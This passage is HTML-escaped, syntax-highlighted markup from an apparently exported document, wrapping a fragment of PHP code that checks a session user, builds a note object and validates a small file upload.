style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;||&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;===&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;die&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;Nope!&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;require&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;models.php&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;isset&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($letter))&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$note &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;new&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;user &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;letter &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $letter;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_FILES[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'file'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;][&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'size'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 0)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_FILES[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'file'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;][&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'size'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 30)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;too big&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_FILES[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'file'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;][&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'error'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 0 &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;||&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;is_uploaded_file&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_FILES[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'file'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;][&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'tmp_name'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;]))&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;error1&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier 